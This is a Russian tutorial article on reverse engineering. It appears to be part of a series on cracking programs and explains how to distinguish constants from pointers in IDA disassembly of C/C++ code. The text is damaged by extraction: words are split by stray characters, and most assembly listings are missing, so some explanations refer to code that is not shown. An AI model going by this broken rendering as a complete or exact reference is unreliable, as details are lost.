Хотя­ IDA предста­ ­вила данные­ программы­ так, как их пригото­ ­вил компилятор­ , мы уже самостоятель­ ­но определи­ ­ли, что по смещению­ unk_451110 находится­ число­ , занимающее­ больше­ одного­ байта­ . Поэтому­ мы можем помочь IDA правиль­ ­но отобразить­ данные­ . Для этого­ , перейдя­ по смещению­ , надо нажать клавишу­ с английской­ o, что соответс­ ­тву­ет команде­ : Edit → Operand Type → Ofset → Ofset (data segment). В результате­ смещение­ будет переиме­ ­

новано­ , а значение­ , на которое оно указыва­ ­ет, примет­ благород­ ­ный вид: 777h. Кроме­ того, команда­ преобра­ ­зова­ния неопределен­ ­ных байтов­ в дан ­ ные с db (один байт) изменит­ ­ся на dq (восемь байт).

Инициали­ зация­ локальных­ переменных­ :

Копиру­ ем­ ссылку­ на переменную­ в памяти и таким образом­ получаем­ воз ­ можность изменить­ ссылку­ , но не значение­ .

mov rax, [rbp+var_18]

Присваиваем­ локальной­ переменной­ var_1C значение­ , содержаще­ ­еся в ECX. А там хранит­ ­ся указатель­ на 0x777.

Черт ногу сломит­ с этими­ указате­ ­лями! Теперь рассмот­ ­рим пример­ func_pointers_cb с косвенным­ вызовом функции­ (также­ скомпилиро­ ­ван­ный с помощью C++Builder):

int func(int a, int b)

{

return a + b;

}

int _tmain(int argc, _TCHAR* argv[])

{

int (*zzz) (int a, int b) = func;

// Вызов функции происходит косвенно — по указателю zzz

zzz(0x666, 0x777);

return 0;

}

Резуль­ тат­ компиляции­ должен­ выглядеть­ приблизитель­ но­ так:

; а EDX — 0x777, регистры загружены и готовы для передачи параметров

А вот и косвенно­ вызываемая­ функция­ func. Исследуем­ ее, чтобы­ определить­ тип передаваемых­ ей непосредс­ твен­ ных­ значений­ .

IDA не определи­ ла­ аргумен­ ты­ , но мы то знаем­ , что они есть! Сейчас­ , когда­ параметры­ всегда­ передаются­ через регистры­ , различие­ между­ аргумен­ тами­ и локальными­ переменными­ — чистая­ формаль­ ность­ .

; Открываем кадр стека

Присваиваем­ значение­ переменной­ var_4, учитывая­ , что в регистре­ ECX передается­ параметр, var_4 — аргумент­ :

Присваиваем­ значение­ переменной­ var_8, учитывая­ , что в регистре­ EDX передается­ параметр, var_8 — аргумент­ :

; Выполняем сложение с переменной, записывая сумму на место первого

слагаемого

add ecx, [rbp+var_8]

; Значение суммы копируем в переменную var_C

Сложные случаи адресации или математические операции с указателями

C/C++ и некоторые­ другие­ языки­ программи­ ­рова­ния допускают­ выполнение­

над указате­ лями­ различных­ арифметичес­ ких­ операций­ , чем серьезно­ зат ­ рудняют­ идентифика­ цию­ типов непосредс­ твен­ ных­ операн­ дов­ . В самом деле, если бы такие операции­ с указате­ лями­ были запрещены­ , то любая матема ­ тическая­ инструк­ ция­ , манипулиру­ ющая­ с непосредс­ твен­ ным­ операн­ дом­ , однозначно­ указыва­ ла­ бы на его константный­ тип.

К счастью, даже в тех языках­ , где это разрешено­ , над указате­ ­лями выпол ­ няется­ ограничен­ ­ное число­ математичес­ ­ких операций­ . Так, совершенно­ бес ­ смысленно­ сложение­ двух указате­ ­лей, а уж тем более умножение­ или деление их друг на друга­ . Вычитание­ — дело другое­ . Используя­ тот факт,

что компилятор­ располага­ ет­ функции­ в памяти согласно­ порядку­ их объявле­ ­ ния в программе­ , можно­ вычислить­ размер­ функции­ , отнимая­ ее указатель­ от указате­ ля­ на следующую­ функцию­ . Такой трюк встречает­ ся­ в упаков­ щиках­

(распаков­ ­щиках) исполняемых­ файлов­ , защитах с самомодифи­ ­циру­ющим­ся кодом, но в прикладных­ программах­ использует­ ­ся редко­ .

Исполь­ зование­ вычитания­ указате­ лей­ для вычисления­ размера­ функции­ (структуры­ данных­ )

Продолжение статьи0 →

КАК ИСКАТЬ ОПЕРАНДЫ ПРИ ВЗЛОМЕ ПРОГРАММ

MOV EAX, 0x...

MOV EBX, 0x...

ADD EAX, EBX

MOV ECX, [EAX]

Сумма­ двух непосредс­ твен­ ных­ значений­ здесь использует­ ся­ для косвенной­ адресации­ . Ну, положим, оба они указате­ лями­ быть не могут, исходя­ из самых общих соображений­ . Наверняка­ одно из непосредс­ твен­ ных­ значений­ — ука ­ затель на массив­ (структуру­ данных­ , объект­ ), а другое­ — индекс в этом мас ­ сиве. Для сохранения­ работоспособ­ ности­ программы­ указатель­ необходимо­ заменить смещени­ ем­ метки­ , а вот индекс придет­ ся­ оставить­ без изменений­ (ведь индекс — это констан­ та­ ).

Как же различить­ , что есть что? Увы, нет универ­ саль­ ного­ ответа­ , а в кон ­ тексте­ приведен­ ного­ выше примера­ это и вовсе­ невозможно­ !

Рассмот­ ­рим следующий­ пример­ , демонстри­ ­рующий определе­ ­ние типов в комбиниро­ ­ван­ных выражениях­ (combined_exp_types):

void MyFunc(char* a, int i)

{

a[i] = '\n';

a[i + 1] = 0;

}

int main()

{

static char buff[] = "Hello,Sailor!";

MyFunc(&buff[0], 5);

}

Резуль­ тат­ компиляции­ с помощью Microsoft Visual C++ должен­ выглядеть­ так:

;Подготовка параметров:

;в регистр EDX помещается число 5 — второй параметр

Сумма­ непосредс­ твен­ ных­ значений­ использует­ ся­ для косвенной­ адресации­ памяти, значит­ , это констан­ та­ и указатель­ . Но кто есть кто?

Для ответа­ на этот вопрос­ нам необходимо­ понять смысл кода программы­ — чего же добивался­ программист­ сложени­ ем­ указате­ лей­ ? Предположим­ , что значение­ 5 — указатель­ . Логично­ ? Да вот не очень то логично­ : если это ука ­ затель, то указатель­ на что?

Первые­ 64 килобайта­ адресного­ пространс­ тва­ Windows NT заблокиро­ ваны­ для «отлавливания­ » нулевых и неинициали­ зиро­ ван­ ных­ указате­ лей­ . Ясно, что

равным­ пяти указатель­ быть никак не может, разве­ что программист­ исполь ­ зовал какой нибудь очень извращен­ ­ный трюк. А если указатель­ 0x140003038 (фактичес­ ­кий адрес buff)? Выглядит­ правдоподоб­ ­ным легальным­ смещени­ ­

ем...

Кстати­ , что там у нас расположе­ ­но? Секундочку­ ...

Теперь­ все сходит­ ся­ — функции­ передан указатель­ на строку­ "Hello, Sailor!" (значение­ 0x140003038) и индекс символа­ этой строки­ (значение­ 5). Функция­ сложила­ указатель­ со строкой­ и записала­ в полученную­ ячейку­ символ­ "\n".

Следующая­ инструк­ ция­ заносит значение­ аргумен­ та­ arg_8 в регистр EAX. Как мы установи­ ли­ , это констан­ та­ :

;Помещаем в RCX значение аргумента arg_0

;Как мы выяснили, оно представляет собой указатель на строку

Сумма­ RCX и RAX использует­ ся­ для косвенной­ адресации­ памяти, точнее­ кос ­ венно базовой, так как к указате­ лю­ прибав­ ляет­ ся­ еще и единица­ . В эту ячейку­ памяти заносится­ ноль. Другими­ словами­ , мы прописы­ ваем­ ноль за сим ­ волом "\n".

void MyFunc(char *, int) endp

; int __cdecl main(int argc, const char **argv, const char **envp)

public main

Сумма­ непосредс­ ­твен­ных значений­ использует­ ­ся для косвенной­ адресации­ памяти. Этот прием­ мы уже проходи­ ­ли, разбирая­ дизассем­ ­блер­ный листинг­

от Visual C++. Однако­ вопрос­ все тот же: как понять, где констан­ ­та, а где ука ­ затель? Как и в предыду­ ­щем случае­ , необходимо­ проана­ ­лизи­ровать их зна ­ чения.

; Снова косвенная адресация памяти, чтобы поставить после символа

новой строки "\n" 0

MyFunc(char *, int) endp

По сравнению­ с листингом­ от Visual C++ листинг­ от C++Builder имеет­ минимальные­ различия­ . Раньше­ было не так... Даже не знаю, радоваться­ это ­ му или огорчать­ ­ся.

Порядок индексов и указателей

Открою­ маленький­ секрет­ : при сложении­ указате­ ­ля с констан­ ­той большинс­ ­ тво компилято­ ­ров на первое­ место­ помещают­ указатель­ , а на второе­ — кон ­ станту­ , каким бы ни было их расположе­ ­ние в исходной программе­ . Иначе­ говоря, выражения­ a[i], (a+i)[0], *(a+i) и *(i+a) компилиру­ ­ются в один и тот же код! Даже если извратить­ ­ся и написать так: (0)[i+a], компилятор­

все равно­ выдвинет­ a на первое­ место­ . Что это — ослиное­ упрямство­ , игра случая­ или фича? Ответ до смешного­ прост — сложение­ указате­ ля­ с констан­ ­ той дает указатель­ ! Поэтому­ результат­ вычислений­ всегда­ записывает­ ся­ в переменную­ типа «указатель­ ».

Вернемся­ к последне­ ­му рассмот­ ­ренно­му примеру­ (combined_exp_types_cb), применив­ для анализа­ наше новое правило­ :

; Копирование значений из локальных переменных в регистры

Сложение­ RAX и RCX. Операция­ сложения­ указыва­ ет­ на то, что по крайней­ мере один из них констан­ та­ , а другой­ — либо констан­ та­ , либо указатель­ .

Ага! Сумма­ непосредс­ твен­ ных­ значений­ использует­ ся­ для косвенной­ адре ­ сации памяти, значит­ , это констан­ та­ и указатель­ . Но кто из них кто? С боль ­ шой степенью­ вероятности­ RAX — указатель­ (так оно и есть), посколь­ ку­ он стоит­ на первом­ месте­ , а RCX — индекс, так как он стоит­ на втором­ !

Использование LEA для сложения констант

Инструк­ ­ция LEA широко использует­ ­ся компилято­ ­рами не только­ для ини ­ циализации­ указате­ ­лей, но и для сложения­ констант­ . Посколь­ ­ку внутренне­ представ­ ­ление констант­ и указате­ ­лей идентично­ , результат­ сложения­ двух указате­ ­лей идентичен­ сумме­ тождес­ ­твен­ных им констант­ . То есть LEA EBX, [ EBX+0x666] == ADD EBX, 0x666, однако­ по своим­ функци­ ­ональ­ным воз ­ можностям­ LEA значитель­ ­но обгоняет­ ADD. Вот, например­ , LEA ESI, [ EAX*4+EBP-0x20], попробуй­ то же самое «скормить­ » инструк­ ­ции ADD!

Встретив­ в тексте­ программы­ команду­ LEA, не торопись навешивать­

на возвра­ ­щен­ное ею значение­ ярлык «указатель­ »: с не меньшим­ успехом­ он может оказать­ ­ся и констан­ ­той! Если «подозрева­ ­емый» ни разу не использует­ ­ ся в выражении­ косвенной­ адресации­ — никакой это не указатель­ , а самая настоящая­ констан­ ­та!

«Визуальная» идентификация констант и указателей

Вот несколь­ ­ко приемов­ , помогающих­ отличить­ указате­ ­ли от констант­ .

1.В 64-разрядных­ Windows-программах­ указате­ ­ли могут принимать­ огра ­ ниченный­ диапазон­ значений­ . Доступный­ процес­ ­сорам регион­ адресного­ пространс­ ­тва начинается­ со смещения­ 0

0x00000000 00010000 и простира­ ­ется до смещения­ 0x000003FF FFFFFFFF. Поэтому­ все непосредс­ ­твен­ные значения­ , меньшие­

0x00000000 00010000 и большие­ 0x000003FF FFFFFFFF, представ­ ­ляют собой констан­ ­ты, а не указате­ ­ли. Исключение­ составля­ ­ет число­ ноль, обознача­ ­ющее нулевой указатель­ . Некоторые­ защитные­ механизмы­ непосредс­ ­твен­но обращают­ ­ся к коду операци­ ­онной системы­ , рас ­ положенному­ выше адреса­ 0x000003FF FFFFFFFF, где начинаются­ вла ­ дения ядра.

2.Если­ непосредс­ ­твен­ное значение­ смахива­ ­ет на указатель­ , посмотри­ , на что он указыва­ ­ет. Если по данному­ смещению­ находится­ пролог­ фун ­ кции или осмысленная­ тексто­ ­вая строка­ , скорее­ всего­ , мы имеем­ дело с указате­ ­лем, хотя, может быть, это всего­ лишь совпадение­ .

3.Загляни­ в таблицу­ перемещаемых­ элемен­ ­тов. Если адрес «подследс­ ­твен ­ ного» непосредс­ ­твен­ного значения­ есть в таблице­ , это, несомненно­ , ука ­ затель. Беда в том, что большинс­ ­тво исполняемых­ файлов­ неперемеща­ ­ емы и такой прием­ актуален­ лишь для исследова­ ­ния DLL (а DLL переме ­ щаемы по определе­ ­нию).

Кслову­ сказать­ , дизассем­ ­блер IDA Pro использует­ все три описан­ ­ных спо ­ соба для автомати­ ­чес­кого опознавания­ указате­ ­лей.